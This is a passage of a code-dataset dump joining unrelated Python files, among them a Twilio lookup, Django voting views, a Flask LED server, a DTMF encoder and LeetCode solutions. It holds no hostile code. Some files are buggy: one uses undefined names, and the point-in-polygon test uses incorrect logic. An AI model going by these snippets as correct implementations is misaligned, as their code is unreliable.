_phone_book[national_format(number)] = number_data.add_ons['results']['twilio_carrier_info']['result']['carrier']['type']\n db.add_phone_type(national_format(number), _phone_book[national_format(number)])\n except TwilioRestException as e:\n if e.code == 20404:\n return number, 'invalid'\n else:\n raise e\n # print(number, number_data.add_ons['results']['twilio_carrier_info']['result']['carrier']['type'])\n return number, number_data.add_ons['results']['twilio_carrier_info']['result']['carrier']['type']\n\n ","sub_path":"lds_robocalling/services/phone.py","file_name":"phone.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"585161880","text":"# -*- coding: utf-8 -*-\n\"\"\"Core equation type.\"\"\"\n\nfrom __future__ import absolute_import\n\nimport ast\nimport inspect\nimport sys\nimport warnings\n\nfrom sage.all import SR, Expression\nfrom sage.misc.latex import latex\nfrom sage.rings import integer, real_mpfr\n\nfrom ..variables import SHORT_UNIT_SYMBOLS, Variable\nfrom ..variables._core import BaseVariable\n\n\ndef convert(expr):\n \"\"\"Convert a given expression.\"\"\"\n op = expr.operator()\n ops = expr.operands()\n if op:\n return op(*(convert(o) for o in ops))\n return expr.convert() if hasattr(expr, 'convert') else expr\n\n\nclass BaseEquation(Expression):\n \"\"\"Add definition and short unit.\"\"\"\n\n @property\n def __doc__(self):\n return self.definition.__doc__\n\n @property\n def definition(self):\n return Equation.__registry__[self]\n\n def expand_units(self, simplify_full=True):\n \"\"\"Expand units of all arguments in expression.\"\"\"\n used_units = {}\n # Need to multiply units with variable,\n # so that we can devide by the symbolic equation later:\n for variable in self.arguments():\n used_units[variable] = variable * Variable.__units__[variable]\n\n result = BaseEquation(SR, self.subs(used_units) / self).convert()\n if simplify_full:\n result = result.simplify_full()\n return result\n\n def short_units(self):\n \"\"\"Return short units of equation.\"\"\"\n expanded = self.expand_units()\n return expanded.lhs().subs(SHORT_UNIT_SYMBOLS) \\\n == expanded.rhs().subs(SHORT_UNIT_SYMBOLS)\n\n def convert(self):\n return convert(self)\n\n\n_Integer = ast.parse('integer.Integer', mode='eval').body\n_Float = ast.parse('real_mpfr.RR', mode='eval').body\n\n\nclass Numbers(ast.NodeTransformer):\n \"\"\"Change Python numbers to Sage numbers.\"\"\"\n\n def visit_Num(self, node):\n \"\"\"Rewrite int / int to Fraction(int, int).\"\"\"\n func = _Integer\n if isinstance(node.n, float):\n func = _Float\n return ast.copy_location(\n ast.Call(\n func=func,\n args=[ast.Str(str(node.n))],\n keywords=[],\n starargs=None,\n kwargs=None, ), node)\n\n\nclass ClassDef(ast.NodeVisitor):\n \"\"\"Extract expression definition.\"\"\"\n\n def __init__(self):\n \"\"\"Initialize class definition.\"\"\"\n self.expr = None\n\n def visit_Assign(self, node):\n \"\"\"Find 'expr = '.\"\"\"\n for target in node.targets:\n if target.id != 'expr':\n continue\n expr = ast.Expression(Numbers().visit(node.value))\n ast.fix_missing_locations(expr)\n self.expr = compile(expr, '', mode='eval')\n break\n\n\ndef build_instance_expression(instance, expr, back=1):\n \"\"\"Return fixed expression.\"\"\"\n try:\n # Evaluate expression in the original context.\n frame = sys._getframe(back + 1)\n\n # Find original code and convert numbers.\n code = ast.parse(inspect.getsource(instance))\n class_def = ClassDef()\n class_def.visit(code)\n\n # Include names used during number replacement.\n f_globals = frame.f_globals.copy()\n f_globals.setdefault('integer', integer)\n f_globals.setdefault('real_mpfr', real_mpfr)\n\n # Include locally defined variables.\n f_locals = frame.f_locals.copy()\n for name in dir(instance):\n data = getattr(instance, name)\n if isinstance(data, BaseVariable):\n f_locals[name] = data\n expr = eval(class_def.expr, f_globals, f_locals)\n except TypeError:\n pass\n\n return BaseEquation(SR, expr)\n\n\nclass EquationMeta(type):\n \"\"\"Equation interface.\"\"\"\n\n def __new__(cls, name, parents, dct):\n \"\"\"Build and register new variable.\"\"\"\n if '__registry__' not in dct:\n dct.setdefault('name', name)\n expr = dct.pop('expr')\n\n instance = super(EquationMeta, cls).__new__(\n cls, name, parents, dct)\n instance.expr = expr = build_instance_expression(instance, expr)\n\n if expr in instance.__registry__:\n warnings.warn(\n 'Equation \"{0}\" will be overridden by \"{1}\"'.format(\n instance.__registry__[expr].__module__ + ':' + name,\n instance.__module__ + ':' + name, ),\n stacklevel=2)\n instance.__registry__[expr] = instance\n\n expanded_units = expr.expand_units()\n if not expanded_units:\n raise ValueError(\n 'Invalid expression units: {0}'.format(expanded_units))\n return expr\n\n return super(EquationMeta, cls).__new__(cls, name, parents, dct)\n\n\nclass Equation(object):\n \"\"\"Base type for all equations.\"\"\"\n __metaclass__ = EquationMeta\n __registry__ = {}\n\n @classmethod\n def args(cls):\n return tuple(Variable.__registry__[arg].expr\n if arg in Variable.__registry__ else arg\n for arg in cls.expr.args())\n\n\n__all__ = ('Equation', 'convert', )\n","sub_path":"essm/equations/_core.py","file_name":"_core.py","file_ext":"py","file_size_in_byte":5158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"76423909","text":"from fpdf import FPDF\nfrom PIL import Image\nimport glob\n\npdf = FPDF()\n\nimageList = glob.glob(\"*.png\")\nif len(imageList) > 0:\n\tfor image in imageList:\n\t\tcover = Image.open(image)\n\t\twidth, height = cover.size\n\t\twidth, height = float(width * 0.264583), float(height * 0.264583)\n\n\t\tpdf_size = {'P': {'w': 210, 'h': 297}, 'L': {'w': 297, 'h': 210}}\n\n\t\torientation = 'P' if width < height else 'L'\n\n\t\twidth = width if width < pdf_size[orientation]['w'] else pdf_size[orientation]['w']\n\t\theight = height if height < pdf_size[orientation]['h'] else pdf_size[orientation]['h']\n\n\t\tpdf.add_page(orientation=orientation)\n\n\t\tpdf.image(image, 0, 0, width, height)\n\tpdf.output(\"newPdf.pdf\", \"F\")\n\tprint(\"file created\")\nelse:\n\tprint(\"This type of image does not exist within this directory!!\")","sub_path":"pngToPdf.py","file_name":"pngToPdf.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"481771140","text":"from flask import Flask\nimport RPi.GPIO as GPIO\n\napp=Flask(__name__) #객체생성\n\nledPin = 14\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(ledPin,GPIO.OUT)\n\n\n@app.route('/')\ndef flask():\n\treturn \"Hello Flask\"\n@app.route('/led/on')\ndef ledOn():\n\tGPIO.output(ledPin,True) #한번켜지는 명령을 계속주는 것이다\n\treturn \"

Led ON

\"\n\n@app.route('/led/off')\ndef ledOff():\n\tGPIO.output(ledPin,False) #한 번 꺼지는 명령을 계속 주는 것이다\n\treturn \"

Led off

\"\n\n@app.route('/led/clean')\ndef clean():\n\tGPIO.cleanup()\n\treturn \"

GPIO Clean

\"\n\nif __name__==\"__main__\":\n\tapp.run(host=\"0.0.0.0\",port=\"8080\")\n","sub_path":"Flask/appLedTest.py","file_name":"appLedTest.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"582019928","text":"from time import sleep\r\n\r\nwork_time = int(input(\"Enter work time in minutes: \"))\r\nrest_time = int(input(\"Enter rest itme minutes: \"))\r\nnum_of_repeats = int(input(\"Enter number of repeats in minutes: \"))\r\n\r\nimport winsound\r\nfrequency = 2500 # Set Frequency To 2500 Hertz\r\nduration = 1000 # Set Duration To 1000 ms == 1 second\r\n\r\ndef beep():\r\n winsound.Beep(frequency, duration)\r\n\r\ndef annoy():\r\n for i in range(1, 10): winsound.Beep(i * 100, 200)\r\n\r\n\r\nfor i in range(num_of_repeats +1):\r\n \r\n print(str(i + 1) + \": Working!\")\r\n beep()\r\n for i in range(1, work_time):\r\n print(i)\r\n sleep(60)\r\n\r\n print(\"Resting\")\r\n annoy()\r\n for i in range(1, rest_time +1):\r\n print(i)\r\n sleep(60)\r\n","sub_path":"interval_timer.py","file_name":"interval_timer.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"52223075","text":"import Tones\nimport serial\nimport serial.tools.list_ports\nimport DateTime\nimport pyaudio\nimport array\n\n\n\n\nclass Coder():\n def __init__(self):\n self.Time = {\"ID\" : 5, \n \"Month\" : 0, \n \"Day\" : 0,\n \"Hour\" : 0,\n \"Minute\": 0,\n \"Second\": 0}\n self.dt = DateTime.DateTime()\n self.ser = serial.Serial(port='COM4', \\\n baudrate=115200, \\\n parity=serial.PARITY_NONE, \\\n stopbits=serial.STOPBITS_ONE,\\\n bytesize=serial.EIGHTBITS, \\\n timeout=0)\n\n self.ser.write(b\"debug.gps.sniff\\r\")\n\n def __StringToTime(self, string):\n str = [s for s in string.split()]\n self.Time[\"Month\"] = int(str[3][0:2])\n self.Time[\"Day\"] = int(str[3][2:4])\n self.Time[\"Hour\"] = int(str[4][0:2])\n self.Time[\"Minute\"] = int(str[4][2:4])\n self.Time[\"Second\"] = int(str[4][4:6])\n\n def __TimeToDateTime(self):\n self.dt.setSeconds(self.Time['Second'])\n self.dt.setMinutes(self.Time['Minute'])\n self.dt.setHours(self.Time['Hour'])\n self.dt.setDays(self.Time['Day'])\n self.dt.setMonth(self.Time['Month'])\n self.dt.setId(self.Time['ID'])\n\n def __DateTimeToDTMF(self):\n bufferDTMF = []\n p = pyaudio.PyAudio()\n l = [0] * 5000\n stream = p.open(format=p.get_format_from_width(2),\n channels=1,\n rate=44100,\n output=True)\n\n string = str(hex(self.dt.id)[2:]) + str(hex(self.dt.data)[2:])\n \n for i in string:\n bufferDTMF += Tones.Tones[i]\n \n bufferDTMF += l\n\n bufferDTMF = array.array('B', bufferDTMF).tostring()\n\n stream.write(bufferDTMF)\n\n def run(self):\n buffer = []\n while True:\n for c in self.ser.read():\n c = chr(c)\n buffer.append(c)\n if c == '\\r':\n str = ''.join(buffer)\n self.__StringToTime(str)\n self.__TimeToDateTime()\n self.__DateTimeToDTMF()\n print(str)\n line = []\n \n\n\n\n\n\ndef ListAvailableComPorts():\n list = serial.tools.list_ports.comports()\n for element in list:\n print(element.device)\n\ndef DataToTime(data):\n str = [s for s in data.split()]\n Time[\"Month\"] = int(str[3][0:2])\n Time[\"Day\"] = int(str[3][2:4])\n Time[\"Hour\"] = int(str[4][0:2])\n Time[\"Minute\"] = int(str[4][2:4])\n Time[\"Second\"] = int(str[4][4:6])\n return Time\n\ndef EncodeData(data):\n dt.setSeconds(Time['Second'])\n dt.setMinutes(Time['Minute'])\n dt.setHours(Time['Hour'])\n dt.setDays(Time['Day'])\n dt.setMonth(Time['Month'])\n dt.setId(Time['ID'])\n\n return dt\n\ndef DataToDTMF(data):\n bufferDTMF = []\n p = pyaudio.PyAudio()\n\n stream = p.open(format=p.get_format_from_width(2),\n channels=1,\n rate=44100,\n output=True)\n\n string = str(hex(data.id)[2:]) + str(hex(data.data)[2:])\n \n for i in string:\n bufferDTMF += Tones.Tones[i]\n \n bufferDTMF += l\n\n bufferDTMF = array.array('B', bufferDTMF).tostring()\n\n stream.write(bufferDTMF)\n \n return bufferDTMF\n\n\ndef main():\n buffer = []\n coder = Coder()\n coder.run()\n\n #ser = serial.Serial(port='COM4', \\\n # baudrate=115200, \\\n # parity=serial.PARITY_NONE, \\\n # stopbits=serial.STOPBITS_ONE,\\\n # bytesize=serial.EIGHTBITS, \\\n # timeout=0)\n\n #ser.write(b\"debug.gps.sniff\\r\")\n\n #while True:\n # for c in ser.read():\n # c = chr(c)\n # buffer.append(c)\n # if c == '\\r':\n # str = ''.join(buffer)\n # Time = DataToTime(str)\n \n # DataToDTMF(EncodeData(Time))\n # print(str)\n # line = []\n # break\n\n #ser.close()\n\nif __name__ == \"__main__\":\n main()","sub_path":"FunctionsBackup.py","file_name":"FunctionsBackup.py","file_ext":"py","file_size_in_byte":4371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"302895656","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib.auth.decorators import login_required\nfrom .models import Candidate, Position, Vresults\nfrom django.utils import timezone\nfrom .forms import CreateNewCandidate\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.contrib.auth import get_user_model\nfrom django.contrib import messages\nfrom django.contrib.auth import login, logout, authenticate, update_session_auth_hash\nfrom django.urls import reverse\nfrom django.template import loader\nimport datetime\n\nUser = get_user_model()\n\n# Create your views here.\n\n\ndef main(request):\n return render(request, 'voter_account/main.html')\n\n\n@login_required(login_url='/voter_account/signup')\ndef home(request):\n candidates = Candidate.objects\n return render(request, 'candidate_page/home.html', {'candidates': candidates})\n\n\n@login_required(login_url='/voter_account/signup')\ndef create(request):\n # reglimit = datetime.date(2021, 7, 10)\n # tday = datetime.date.today()\n # if tday >= reglimit:\n # messages.warning(request, 'Sorry, the registration period has ended!')\n # return redirect('regend')\n # else:\n form = CreateNewCandidate()\n if Candidate.objects.filter(account=request.user).exists():\n messages.warning(\n request, 'You have already registered for a position!')\n return render(request, 'candidate_page/create.html', {'form': form})\n else:\n if request.method == 'POST':\n form = CreateNewCandidate(\n request.POST or None, request.FILES or None)\n if form.is_valid():\n instance = form.save(commit=False)\n instance.account = request.user\n instance.save()\n messages.success(\n request, 'You have successfully registered as a candidate!')\n return redirect('/candidate_page/' + str(instance.id))\n else:\n return render(request, 'candidate_page/create.html', {'form': form, 'error': 'All fields are required'})\n\n else:\n form = CreateNewCandidate()\n return render(request, 'candidate_page/create.html', {'form': form})\n\n\n@login_required(login_url='/voter_account/signup')\ndef detail(request, instance_id):\n candidate = get_object_or_404(Candidate, pk=instance_id)\n return render(request, 'candidate_page/detail.html', {'candidate': candidate})\n\n\n@login_required(login_url='/voter_account/signup')\ndef candidates(request):\n candidates = Candidate.objects\n return render(request, 'candidate_page/candidate.html', {'candidates': candidates})\n\n\n@login_required(login_url='/voter_account/signup')\ndef regend(request):\n return render(request, 'candidate_page/regend.html')\n\n\n@login_required(login_url='/voter_account/signup')\ndef votepage(request):\n votestart = datetime.date(2020, 7, 21)\n voteend = datetime.date(2023, 7, 28)\n tday = datetime.date.today()\n if tday >= votestart and tday <= voteend:\n position_list = Position.objects\n return render(request, 'candidate_page/votepage.html', {'position_list': position_list})\n elif tday <= votestart:\n messages.warning(request, 'Sorry, voting will start on 2021/07/18 !')\n return redirect('regend')\n else:\n messages.warning(request, 'Sorry, the voting period has ended !')\n return redirect('regend')\n\n\n@login_required(login_url='/voter_account/signup')\ndef votedetail(request, position_id):\n try:\n position = Position.objects.get(pk=position_id)\n except Position.DoesNotExist:\n raise Http404('Position does not exist')\n return render(request, 'candidate_page/votedetail.html', {'position': position})\n\n\n@login_required(login_url='/voter_account/signup')\ndef vote(request, position_id):\n sposition = get_object_or_404(Position, pk=position_id)\n if request.method == \"POST\":\n voter = Vresults.objects.get_or_create(\n account=request.user, position=sposition)[0]\n if voter.status == False:\n try:\n selected_candidate = sposition.candidate_set.get(\n pk=request.POST['candidate'])\n except (KeyError, Candidate.DoesNotExist):\n messages.warning(request, 'You did not select a candidate')\n return render(request, 'candidate_page/votedetail.html', {'position': sposition})\n else:\n selected_candidate.total_vote += 1\n selected_candidate.save()\n voter.status = True\n voter.save()\n return HttpResponseRedirect(reverse('detailresults', args=(position_id,)))\n else:\n messages.warning(request, 'You already voted for this position!')\n return render(request, 'candidate_page/votedetail.html', {'position': sposition})\n else:\n return render(request, 'candidate_page/votedetail.html', {'position': sposition})\n\n\n@login_required(login_url='/voter_account/signup')\ndef detailresults(request, position_id):\n position = get_object_or_404(Position, pk=position_id)\n return render(request, 'candidate_page/detailresults.html', {'position': position})\n\n\n@login_required(login_url='/voter_account/signup')\ndef results(request):\n candidates = Candidate.objects.all().order_by('position', '-total_vote')\n return render(request, 'candidate_page/results.html', {'candidates': candidates})\n","sub_path":"candidate_page/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"443536187","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jan 2 11:37:31 2019\r\n\r\n@author: hjiang\r\n\"\"\"\r\n\r\n\"\"\"\r\nYou are given coins of different denominations and a total amount of money amount. \r\nWrite a function to compute the fewest number of coins that you need to make up that amount. \r\nIf that amount of money cannot be made up by any combination of the coins, return -1.\r\n\r\nExample 1:\r\n\r\nInput: coins = [1, 2, 5], amount = 11\r\nOutput: 3 \r\nExplanation: 11 = 5 + 5 + 1\r\nExample 2:\r\n\r\nInput: coins = [2], amount = 3\r\nOutput: -1\r\nNote:\r\nYou may assume that you have an infinite number of each kind of coin.\r\n\r\n题意:最少需要多少个硬币\r\n\"\"\"\r\n# Time: O(n * k), n is the number of coins, k is the amount of money\r\n# Space: O(k)\r\n# DP solution. (1680ms)\r\n\r\nclass Solution(object):#这没有超时了,但是思路很清楚,用这个回答也可以\r\n def coinChange(self, coins, amount):\r\n \"\"\"\r\n :type coins: List[int]\r\n :type amount: int\r\n :rtype: int\r\n \"\"\"\r\n INF = 0x7fffffff # Using float(\"inf\") would be slower. 看到这种搞最小的,先搞float(\"inf\")\r\n amounts = [INF] * (amount + 1)\r\n amounts[0] = 0\r\n for i in range(amount + 1):\r\n if amounts[i] != INF:\r\n for coin in coins:\r\n if i + coin <= amount:\r\n amounts[i + coin] = min(amounts[i + coin], amounts[i] + 1)#关键,表示数字i+coin可以由硬币数为amounts[i] + 1构成\r\n return amounts[amount] if amounts[amount] != INF else -1\r\n \r\n \r\n#Assume dp[i] is the fewest number of coins making up amount i, then for every coin in coins, dp[i] = min(dp[i - coin] + 1).\r\n#\r\n#The time complexity is O(amount * coins.length) and the space complexity is O(amount)\r\n#https://leetcode.com/problems/coin-change/discuss/77372/Clean-dp-python-code\r\nclass Solution1(object):\r\n def coinChange(self, coins, amount):\r\n MAX = float('inf')\r\n dp = [0] + [MAX] * amount\r\n\r\n for i in range(1, amount + 1):\r\n dp[i] = min([dp[i - c] if i - c >= 0 else MAX for c in coins]) + 1\r\n\r\n# return [dp[amount], -1][dp[amount] == MAX]\r\n if dp[amount] == MAX: return -1\r\n else: return dp[amount] \r\n \r\nif __name__ == \"__main__\":\r\n print(Solution().coinChange([1,2,5], 11))","sub_path":"Python3.6/322-Py3-M-Coin-Change.py","file_name":"322-Py3-M-Coin-Change.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"205231050","text":"\"\"\"\nPython implementation of Point inside the polygon,\n\"\"\"\n\n\nfrom ComputationalGeometry.modules import utils\n\n\ndef pointInsidePolygon(P, q):\n count = 0\n for idx, point in enumerate(P):\n if idx != len(P) - 1:\n if P[idx][0] <= q[0] <= P[idx + 1][0] or P[idx][0] >= q[0] >= P[idx + 1][0]:\n if P[idx][1] < q[1]:\n count += 1\n print(P[idx], P[idx + 1])\n\n if count % 2 == 1:\n return True\n else:\n return False\n\n\nP = utils.dummy_simple_polygon()\n\nq = [368, 308]\n\nprint(\"Point inside polygon: \", pointInsidePolygon(P, q))\n\nimport matplotlib.pyplot as plt\n\ncoord = P\ncoord.append(coord[0])\n\nxs, ys = zip(*coord)\n\nplt.figure()\nplt.plot(xs, ys)\nplt.plot([q[0]], [q[1]], marker='o', markersize=4, color=\"red\")\nplt.show()\n","sub_path":"ComputationalGeometry/pointInsidePolygon.py","file_name":"pointInsidePolygon.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"392693063","text":"\"\"\"\nNo exemplo a seguir, dois tipos de informação são armazenados para\ncada pizza: o tipo de massa e a lista de ingredientes. A lista de ingredientes\né um valor associado à chave 'toppings'. Para usar os itens da lista,\nfornecemos o nome do dicionário e a chave 'toppings', como faríamos com\nqualquer valor do dicionário. Em vez de devolver um único valor, teremos\numa lista de ingredientes:\n\"\"\"\n\n#Armazena informações sobre uma pizza que está sendo pedida\npizza = {\n 'casca': 'grossa',\n 'coberturas': ['cogumelo', 'queijo extra'],\n}\n\n#Resume o pedido\nprint(\"Você pediu a pizza com a casca \" + pizza['casca'] + \" e com a seguinte cobertura:\")\n\nfor cobertura in pizza['coberturas']:\n print(\"\\t\" + cobertura)","sub_path":"Capitulo 6/pizza.py","file_name":"pizza.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"214891025","text":"# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport mock\nfrom oslo_log import log as logging\nimport testtools\n\nfrom neutron.plugins.ml2.drivers.linuxbridge.agent import \\\n linuxbridge_neutron_agent\nfrom neutron.tests.functional.agent.linux import test_ip_lib\n\nLOG = logging.getLogger(__name__)\nlba = linuxbridge_neutron_agent\n\n\nclass LinuxBridgeAgentTests(test_ip_lib.IpLibTestFramework):\n\n def setUp(self):\n super(LinuxBridgeAgentTests, self).setUp()\n agent_rpc = ('neutron.agent.rpc.PluginApi')\n mock.patch(agent_rpc).start()\n mock.patch('neutron.agent.rpc.PluginReportStateAPI').start()\n\n def test_validate_interface_mappings(self):\n mappings = {'physnet1': 'int1', 'physnet2': 'int2'}\n with testtools.ExpectedException(SystemExit):\n lba.LinuxBridgeManager(mappings)\n self.manage_device(\n self.generate_device_details()._replace(namespace=None,\n name='int1'))\n with testtools.ExpectedException(SystemExit):\n lba.LinuxBridgeManager(mappings)\n self.manage_device(\n self.generate_device_details()._replace(namespace=None,\n name='int2'))\n lba.LinuxBridgeManager(mappings)\n","sub_path":"neutron/tests/functional/agent/test_l2_lb_agent.py","file_name":"test_l2_lb_agent.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"382237571","text":"from pyodbc import connect\nimport json\n\nclass HoaDon:\n def __init__(self):\n file = open('project/models/Data/NameServer.json',encoding='utf-8')\n NameSerrver_1 = json.load(file)\n file.close()\n self.db = connect('Driver={SQL Server};Database='+NameSerrver_1[\"NameDatabase\"]+';Server='+NameSerrver_1[\"NameServer\"]+';Trusted_connection=Yes')\n\n def Tao_HD(self, arr):\n sql ='''INSERT INTO dbo.HoaDon(MaHD,idKH,id,DateTT,TongTien)\n VALUES( ?, ? ,? , ?, ?)'''\n cur = self.db.cursor()\n cur.execute(sql,arr)\n ret = cur.rowcount\n self.db.commit()\n cur.close()\n return ret\n \n \n def Lay_HD_idKH(self, idKH):\n sql = '''SELECT MaHD,idKH,id,CONVERT(varchar,DateTT,103) AS 'DateTT',TongTien FROM dbo.HoaDon WHERE idKH = ?'''\n cur = self.db.cursor()\n cur.execute(sql,(idKH, ))\n v = cur.fetchone()\n cur.close()\n return v\n \n def Lay_HD_MaHD(self, MaHD):\n sql = '''SELECT MaHD,idKH,id,CONVERT(varchar,DateTT,103) AS 'DateTT',TongTien FROM dbo.HoaDon WHERE MaHD = ?'''\n cur = self.db.cursor()\n cur.execute(sql,(MaHD, ))\n v = cur.fetchone()\n cur.close()\n return v\n \n def TongHD_Thang(self, Thang,Nam):\n sql = ''' SELECT COUNT(DISTINCT a.MaHD ) AS 'TongHDMonth' FROM dbo.CTHD a, dbo.HoaDon b WHERE a.MaHD=b.MaHD AND MONTH(b.DateTT)=? AND YEAR(b.DateTT)=? '''\n cur = self.db.cursor()\n cur.execute(sql,(Thang,Nam, ))\n v = cur.fetchone()\n cur.close()\n return v[0]\n \n def Lay_HD_NV_theoThang(self,idNV,thang,Nam):\n sql = ''' SELECT a.MaHD,CONVERT(VARCHAR,a.DateTT,103) AS 'DateTT',a.TongTien,b.NameKH FROM dbo.HoaDon a, dbo.ThongTinKH b\n WHERE a.idKH=b.idKH AND a.id=? AND MONTH(a.DateTT)=? AND YEAR(a.DateTT)=? '''\n cur = self.db.cursor()\n cur.execute(sql,(idNV,thang,Nam, ))\n v = cur.fetchall()\n cur.close()\n return v\n\n def del_HD(self,MaHD):\n cur = self.db.cursor()\n cur.execute('DELETE dbo.HoaDon WHERE MaHD =?',(MaHD,))\n ret =cur.rowcount\n self.db.commit()\n cur.close()\n return ret\n \n def Tong_Thu(self, Thang,Nam):\n sql = ''' SELECT ISNULL(SUM(TongTien),0) AS 'TongThu' FROM HoaDon WHERE MONTH(DateTT)=? AND YEAR(DateTT)=? '''\n cur = self.db.cursor()\n cur.execute(sql,(Thang,Nam, ))\n v = cur.fetchone()\n cur.close()\n return v[0]\n\n def __def__(self):\n self.db.close()\n","sub_path":"project/models/hoadon.py","file_name":"hoadon.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"234097921","text":"from selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.common.exceptions import StaleElementReferenceException\nfrom datasets_list_page import DatasetsListPage\nfrom base_page import BasePage\nimport logging\n\n\nLOG = logging.getLogger(__name__)\n\n\nclass ExperimentResultsPage(BasePage):\n\n # The maximum amount of time to wait for experiments to complete. 15mins\n # Once this time has elapsed, the tests will fail.\n experiment_complete_timeout = 60 * 15\n\n results_table_id = 'bccvl-experimentresults-table'\n experiment_status_completed = 'COMPLETED'\n experiment_status_failed = 'FAILED'\n\n def has_results_header(self, header):\n table_header = self._get_result_table_header()\n return header in table_header.text\n\n def has_result_file(self, filename, algorithm=None):\n out_files = self._get_output_file_names(algorithm)\n return len(filter(lambda f: f.text == filename, out_files)) == 1\n\n def get_num_output_files(self):\n return len(self._get_output_file_names())\n\n def has_completed_successfully(self):\n return self.experiment_status_completed == self._get_experiment_status()\n\n def click_datasets(self):\n self.driver.find_element_by_css_selector('a.bccvllinks-datasets').click()\n new_dataset_list_page = DatasetsListPage(self.driver)\n return new_dataset_list_page\n\n def click_experiments(self):\n self.driver.find_element_by_css_selector('a.bccvllinks-experiments').click()\n from experiment_list_page import ExperimentListPage\n new_dataset_list_page = ExperimentListPage(self.driver)\n return new_dataset_list_page\n\n def has_completed_with_failure(self):\n return self.experiment_status_failed == self._get_experiment_status()\n\n def wait_for_experiment_to_complete(self):\n WebDriverWait(self.driver, self.experiment_complete_timeout).until(lambda s: self._is_experiment_complete())\n\n def _get_output_file_names(self, algorithm=None):\n\n if algorithm == None: # return all\n return self.driver.find_elements_by_css_selector(\"table#\" + self.results_table_id + \" tr:not(.info) p:first-child\")\n else: # only return the ones relevant to the algorithm\n items = self.driver.find_elements_by_css_selector(\"table#\" + self.results_table_id + \" tbody tr td:first-child\")\n\n # make a list\n results = []\n # keep track of current label\n current_label = None\n for item in items:\n # if it's a label, try match it\n if item.text.find(\" - \") != -1: # We found a label\n if current_label is not None: # Maybe we've already actually finished\n break\n if item.text.find(\" - \" + algorithm) != -1:\n if current_label is not None:\n break\n else:\n # Remember the algorithm we're working on\n current_label = algorithm\n\n # if it's a file,\n else:\n # see if we're in the right category\n if current_label is None: # we haven't found our label yet\n continue;\n else:\n # Append the filename onto the list\n results.append(item.find_element_by_css_selector(\"p\"))\n\n return results\n\n def _get_result_table_header(self):\n return self.driver.find_element_by_xpath(\"//table[@id='\" + self.results_table_id + \"']/tbody/tr[@class='info']/td\")\n\n def _get_experiment_status(self):\n return self.driver.find_element_by_css_selector(\"div.bccvl-expstatus\").get_attribute(\"data-status\")\n\n def _is_experiment_complete(self):\n # try to avoid race condition. The js on the experiment result\n # page refreshes the whole page automatically. If that happens\n # while selenium is checking for elements, it will fail\n # because all the previously selected elements are no longer available.\n # (StaleElementReferenceException: Message: u'Element not found in the cache - perhaps the page has changed since it was looked up')\n # selenium.wait_for_condition(\n # \"selenium.browserbot.getCurrentWindow().jQuery.active== 0\",\n # 60000)\n count = 5\n while count:\n try:\n experiment_status = self._get_experiment_status()\n return experiment_status in [self.experiment_status_completed, self.experiment_status_failed]\n except StaleElementReferenceException:\n count -= 1\n if not count:\n raise\n LOG.info(\"Page has been reloaded, let's wait a second and retry %d more times\", count)\n\n\n # Flag: newPageLoaded\n # func: wait_for_page_to_load\n","sub_path":"functional_tests/pages/experiment_results_page.py","file_name":"experiment_results_page.py","file_ext":"py","file_size_in_byte":4920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"62900829","text":"# -*- coding: utf-8 -*-\n# Copyright 2018 New Vector\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nfrom mock import Mock\n\nfrom twisted.internet import defer\n\nfrom synapse.api.constants import UserTypes\nfrom synapse.handlers.user_directory import UserDirectoryHandler\nfrom synapse.storage.roommember import ProfileInfo\n\nfrom tests import unittest\nfrom tests.utils import setup_test_homeserver\n\n\nclass UserDirectoryHandlers(object):\n def __init__(self, hs):\n self.user_directory_handler = UserDirectoryHandler(hs)\n\n\nclass UserDirectoryTestCase(unittest.TestCase):\n \"\"\" Tests the UserDirectoryHandler. \"\"\"\n\n @defer.inlineCallbacks\n def setUp(self):\n 